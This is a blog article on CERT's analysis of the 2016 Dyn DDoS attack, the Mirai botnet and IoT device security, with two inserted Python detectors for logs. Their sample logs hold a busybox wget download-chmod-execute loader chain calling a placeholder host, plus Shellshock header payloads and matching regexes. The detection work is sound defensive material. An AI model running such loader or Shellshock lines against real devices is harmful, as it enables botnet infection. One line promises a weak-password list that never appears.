
CERT Analysis on IoT Botnet and DDoS Attacks

This article discusses the importance of IoT device security by looking at CERT's interpretation of the infamous 2016 DDoS attack.

On October 21, 2016, a DDoS attack hit the DNS service provider Dyn. The company is a major DNS provider for many companies in the United States.

On the morning of the attack, Dyn confirmed that its DNS infrastructure on the East Coast was under DDoS attack from sources all over the world. The attacks severely affected the business of Dyn's DNS customers and, worse, made those customers' websites inaccessible. The attacks lasted until 13:45 ET. Dyn said on its official website that it would track down the issue and release an incident report.


Services affected by this attack included Twitter, Etsy, Github, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. Access to popular websites like PayPal, BBC, Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, New York Times, The Verge, and Financial Times was also affected.

Initial Analysis of the Attack

In response, the Computer Emergency Response Team (CERT) initiated an advanced analysis process to follow up on and analyze the DDoS attack. According to the CERT analysis, this incident involved multiple factors, particularly IoT device security vulnerabilities. Beyond the DDoS attack and the DNS security issues visible on the surface, many other issues deserve greater attention and further research.

Dyn said that this DDoS attack involved tens of millions of IP addresses, most of which belonged to IoT and smart devices. Dyn believed that the attack came from malicious code named "Mirai." The hacker groups NewWorldHackers and Anonymous claimed responsibility for the attack.

CERT Analysis on Botnets

The scale of botnets that rely on IoT devices is continuously increasing. Typical IoT DDoS botnet families include the CCTV series that appeared in 2013, the ChickenMM series (including 10771, 10991, 25000, and 36000), and Linux-based cross-platform DDoS botnet families (such as BillGates, Mayday, PNScan, and Gafgyt). CERT has named these Trojans as follows:

Family                          Variant quantity   Sample hash quantity
Trojan[DDoS]/Linux.Mirai        2                  > 100
Trojan[DDoS]/Linux.Xarcen       5                  > 1000
Trojan[DDoS]/Linux.Znaich       3                  > 500
Trojan/Linux.PNScan             2                  > 50
Trojan[Backdoor]/Linux.Mayday   11                 > 1000
Trojan[DDoS]/Linux.DnsAmp       5                  > 500
Trojan[Backdoor]/Linux.Ganiw    5                  > 3000
Trojan[Backdoor]/Linux.Dofloo   5                  > 2000
Trojan[Backdoor]/Linux.Gafgyt   28                 > 8000
Trojan[Backdoor]/Linux.Tsunami  71                 > 1000
Worm/Linux.Moose                1                  > 10
Worm[Net]/Linux.Darlloz         3                  > 10

In this incident, the primary victims infected with Mirai were IoT devices, including routers, network cameras, and DVRs. As early as 2013, organizations engaged in DDoS cyber crime started to shift their targets for capturing botnet hosts from Windows to Linux, and from x86 Linux servers to IoT devices running embedded Linux. Mirai means "future" in Japanese. R&D staff named the new variant "Hajime," which means "beginning" in Japanese.

CERT has captured and analyzed a large number of malicious samples related to smart devices and routers, and worked with the relevant authorities to collect field evidence from some devices. These devices mainly use the MIPS and ARM architectures, and attackers implanted Trojans on them because of default passwords, weak passwords, and serious vulnerabilities that were not fixed in time. Because IoT devices are mass-produced and mass-deployed, and because integrators and O&M staff in many application scenarios lack sufficient competence, a significant proportion of devices still use default passwords and their vulnerabilities cannot be fixed in time.

Mode of the Attack

The Domain Name System (DNS) is the service that maps domain names to their corresponding IP addresses. A DNS server holds a table of domain name to IP address mappings and uses it to resolve the domain names in queries; the resolution result is what directs a visit to the target website. If DNS is hit by a DDoS attack, it cannot resolve domain names properly, and users therefore cannot reach the related websites.

In DDoS botnets targeting IoT devices (including Mirai), attackers brute-force logins over the Telnet port using a list of common credentials, or simply log on with the default password. Once logged on through Telnet, they use the embedded tools that are already present, such as BusyBox and wget, to download the DDoS bot binary, set its executable bit, run it, and take control of the IoT device. Because the devices differ in CPU instruction set architecture, some botnets first determine the system architecture and then select the matching MIPS, ARM, or x86 sample for download. Once these samples are running, the bots receive attack commands and launch attacks.
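As an added example (not from the original article or from CERT), the Python script below turns the infection chain just described into detection logic run over a constructed Telnet honeypot session log: repeated failed logins, then an architecture probe, a BusyBox/wget download, chmod +x, and execution of the dropped file. The log format, the event names and all addresses are assumptions.

```python
import re
from collections import defaultdict
# Constructed Telnet honeypot session log (sample data, not a real capture).
# Assumed line format: "<timestamp> <src_ip> <event> <detail>".
SAMPLE_LOG = """\
2016-10-21T09:01:02Z 198.51.100.7 LOGIN_FAIL root/root
2016-10-21T09:01:03Z 198.51.100.7 LOGIN_FAIL root/12345
2016-10-21T09:01:04Z 198.51.100.7 LOGIN_OK admin/admin
2016-10-21T09:01:05Z 198.51.100.7 CMD cat /proc/cpuinfo
2016-10-21T09:01:06Z 198.51.100.7 CMD /bin/busybox wget http://203.0.113.9/x.mips -O /tmp/.x
2016-10-21T09:01:07Z 198.51.100.7 CMD chmod +x /tmp/.x
2016-10-21T09:01:08Z 198.51.100.7 CMD /tmp/.x
2016-10-21T09:05:00Z 192.0.2.44 LOGIN_OK operator/Kq7!pLw2
2016-10-21T09:05:01Z 192.0.2.44 CMD uptime
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (LOGIN_FAIL|LOGIN_OK|CMD) (.*)$")
ARCH_PROBE = re.compile(r"/proc/cpuinfo|\buname\b")          # CPU architecture check
DOWNLOAD = re.compile(r"\b(?:wget|tftp|ftpget)\b")           # fetch of the bot binary
MAKE_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\s+(\S+)")  # executable bit set
def analyse(log_text, fail_threshold=3):
    """Per source IP: flag credential brute force and the probe/download/chmod/execute chain."""
    sessions = defaultdict(lambda: {"failed_logins": 0, "logged_in": False,
                                    "stages": [], "exec_path": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        _ts, ip, event, detail = m.groups()
        s = sessions[ip]
        if event == "LOGIN_FAIL":
            s["failed_logins"] += 1
        elif event == "LOGIN_OK":
            s["logged_in"] = True
        elif s["logged_in"]:  # commands typed after a successful login
            if ARCH_PROBE.search(detail):
                s["stages"].append("arch_probe")
            elif DOWNLOAD.search(detail):
                s["stages"].append("download")
            elif (mm := MAKE_EXEC.search(detail)):
                s["stages"].append("make_exec")
                s["exec_path"] = mm.group(1)
            elif s["exec_path"] and detail.split()[0] == s["exec_path"]:
                s["stages"].append("execute")
    findings = {}
    for ip, s in sessions.items():
        chain = {"download", "make_exec", "execute"} <= set(s["stages"])
        brute = s["failed_logins"] >= fail_threshold
        if chain or brute:
            findings[ip] = {"brute_force": brute, "loader_chain": chain, "stages": s["stages"]}
    return findings
```

The loader chain is reported even when the login succeeded on the first attempt, which is the default-password case the article describes; the brute-force threshold catches the dictionary case independently.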

The following weak passwords appear in a Mirai sample:


In previous tracking and analysis of IoT botnets, CERT found that many popular devices, including DVR, network camera, and smart router brands, shipped with the default password problem.

Analysis of the Mirai Botnet

The source code of the Mirai botnet was released on Hackforums by a user named "Anna-senpai" on September 30, 2016. The user claimed that the code was released to encourage people to pay more attention to the security industry. After the release, the technique was immediately adopted by other malicious software projects. On October 4, 2016, the code was uploaded to GitHub and was soon forked more than 1,000 times.

CERT analyzed the Mirai source code uploaded to GitHub on October 4, 2016, and sorted out its code structure:

The leaked Mirai source code mainly consists of two parts:

  1. Loader: The loader stores the executable files compiled for each platform and is used to load the actual Mirai attack program.
  2. Mirai: Mirai is the program that hackers use to carry out the attack. It has two parts: bot (the controlled end, written in C) and cnc (the control end, written in Go).

The following modules are available at the bot end:

Module file name   Module function
attack.c           Used for attacks. The attack sub-modules it calls are defined in the other attack_xxx.c files.
checksum.c         Calculates checksums.
killer.c           Ends processes.
main.c             Main module; calls the other sub-modules.
rand.c             Generates random numbers.
resolve.c          Resolves domain names.
scanner.c          Scans the network for devices that can be attacked, for example those using weak passwords.
table.c            Stores encrypted domain name data.
util.c             Provides utility functions.

"Open source" releases of this kind set an extremely bad example and further reduce the cost for other attackers to attack IoT devices. Therefore, this article does not intend to interpret this code.

CERT's Monitoring on IoT Botnets

CERT's situation awareness and monitoring system continuously monitors sample transmission, online control, and attack commands of botnets. In addition to Mirai-related incidents, CERT also detects attacks launched by IoT botnets against other targets.

Attack start time and end time   Sample family (named by the original vendor)   Attack target                                 Attack type
2016-10-22 9:36:48               Mayday                                         203.195..:15000 Guangzhou Tencent             tcp flood
2016-10-20 8:12:57               DDoS                                           www.52*.com                                   XXX
2016-10-20 1:36:20               DDoS                                           www.ssh*.com/user.php Shenzhen XXX company
2016-10-9 18:52:35               Billgates                                      121.199.. Hangzhou XX cloud
2016-9-5 10:57:00                Billgates                                      59.151.. Beijing XX

Before 2014, attackers commonly scanned for weak passwords in order to implant malicious code on Linux-based IoT devices. Since the appearance of Shellshock (CVE-2014-6271), this vulnerability has been widely used across the Internet to scan for hosts and implant malicious code. According to the information captured by the CERT Beeswarm system, the number of Linux host intrusion incidents increased significantly after Shellshock appeared.
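Added example, not part of the original article: a Python check for the Shellshock trigger in constructed web server access logs. It inspects both the User-Agent and Referer fields, since a CGI handler exports any request header into the environment and the trigger can arrive in either. The combined log format and all addresses are assumptions.

```python
import re
from collections import Counter
# Constructed access log lines in combined log format (sample data, not a real capture).
# Assumed field order: ip - - [time] "request" status size "referer" "user-agent".
SAMPLE_ACCESS_LOG = """\
198.51.100.23 - - [25/Sep/2014:03:12:44 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :;}; echo shellshock-probe"
203.0.113.5 - - [25/Sep/2014:03:13:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Sep/2014:03:14:10 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { ignored; }; echo probe" "curl/7.30"
"""
COMBINED_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
# Shellshock trigger: a bash function definition "() {" placed in an attacker-controlled header value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def find_shellshock(log_text):
    """Return (hits, per_ip): one (src_ip, path, field) tuple per matching line, plus counts per IP."""
    hits, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        ip, _ts, request, _status, referer, ua = m.groups()
        parts = request.split()
        path = parts[1] if len(parts) > 1 else request
        for field, value in (("referer", referer), ("user-agent", ua)):
            if SHELLSHOCK_RE.search(value):
                hits.append((ip, path, field))
                per_ip[ip] += 1
    return hits, per_ip
```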

The first Shellshock infection incident detected by CERT occurred in September 2014. Later, CERT published multiple malicious code analysis reports related to IoT devices, such as the Analysis of DYREZA Family Variants Spread Using Routers and Hackers Using HFS to Build Servers and Spread Malicious Codes. Another report, the Trojan[DDoS]/Linux.Znaich Analysis Report, was not published at that time and is now appended to this report. Attackers also used a few other vulnerabilities that can grant host permissions.

Opinions from the CERT Analysis Team

The CERT analysis team believes that IoT botnets spread quickly because of a combination of the following factors:

  1. The number of online IoT devices is increasing substantially with the rapid development of IoT, ranging from smart homes to smart cities.
  2. Windows is the mainstream desktop operating system. With the continuous enhancement of the memory safety capabilities of Windows (such as DEP, ASLR, and SEHOP), it is increasingly difficult to compromise a Windows system through a remotely exposed port. In contrast, injecting malicious code into IoT devices that lack a strict security design has a much higher success rate.
  3. Most IoT devices have no built-in security mechanisms, and many of them are not placed within the traditional IT network. That is, they sit outside the visibility of security monitoring, so problems on these devices cannot be responded to efficiently as they happen.
  4. IoT devices often stay online 24 hours a day and are therefore more stable attack sources than desktop Windows systems.

CERT has expounded the view that threats will spread and generalize in depth with the development of Internet Plus, and used the term "Malware/Other" to explain that security threats are evolving toward new fields such as smart devices. As we feared, security threats are now everywhere, from smart cars, smart homes, and smart wearable devices to smart cities.

Therefore, in this large-scale DDoS incident targeting Dyn's DNS, CERT attaches more importance to the IoT security problems it exposed. Although DNS is often regarded as the Achilles' heel of the Internet, we should not forget that interworking on the Internet relies on IP addresses, and domain names exist merely to make those addresses easier for users to remember. For most users in the large industries of North America, VPNs and IP addresses are widely used for connectivity, and primary system operation does not rely on the DNS service. Therefore, even though such a heavy-traffic DDoS attack inconveniences netizens accessing websites for a period, it cannot shake the foundations of North American society or the Internet.

The Importance of Device Security in IoT

Undoubtedly, DNS is information infrastructure, but an IoT botnet is not merely a tool for launching this kind of attack. IoT is the Internet of Things, and it is also an essential supporting node of the future information society. IoT is a network extended and expanded from the Internet, but it is not merely a network: using embedded sensors, devices, and systems that adopt awareness and information sensing technologies, IoT can build complex applications that span physical and social space.

Many of the devices on which these applications run are necessary infrastructure devices at the critical nodes that sustain people's livelihoods, or even basic sensors of critical industrial control facilities. Intruding into these devices yields deeper resource value and is more dangerous than using them to launch DDoS attacks. The existence of vulnerabilities across large areas of the IoT brings more concealed and more dangerous social security and national security risks, and such threats are difficult to perceive.

It is natural to use public impact as the main indicator for evaluating the severity of cybersecurity incidents. But as security threats gradually become more targeted and more concealed, we should not restrict our focus to risks that are easy to identify; doing so lets more dangerous threats slip through. Even though the Dyn DDoS attack only affected access to websites, the underlying concept behind the attack can easily be extended to other applications.

CERT has been strengthening the security protection of IoT devices, raising the cost of attacking or intruding into IoT devices, and enhancing security threat monitoring and alerting for IoT devices. This is similar to what we have done over the last decade to get the CERT AVL SDK engine running on tens of thousands of firewalls and billions of mobile phones.


In this article, we discussed CERT's perspective on how IoT devices became the major targets of the security threats behind the Dyn attack in 2016. The more we depend on IoT technology, the more important the security of IoT devices becomes.

With advances in technology, IoT is in the process of becoming more secure through the latest monitoring and intrusion prevention systems. CERT is working to win this battle soon and hopes to secure this revolutionary technology completely.

To learn more about IoT and security, visit www.alibabacloud.com/blog.

Alibaba Clouder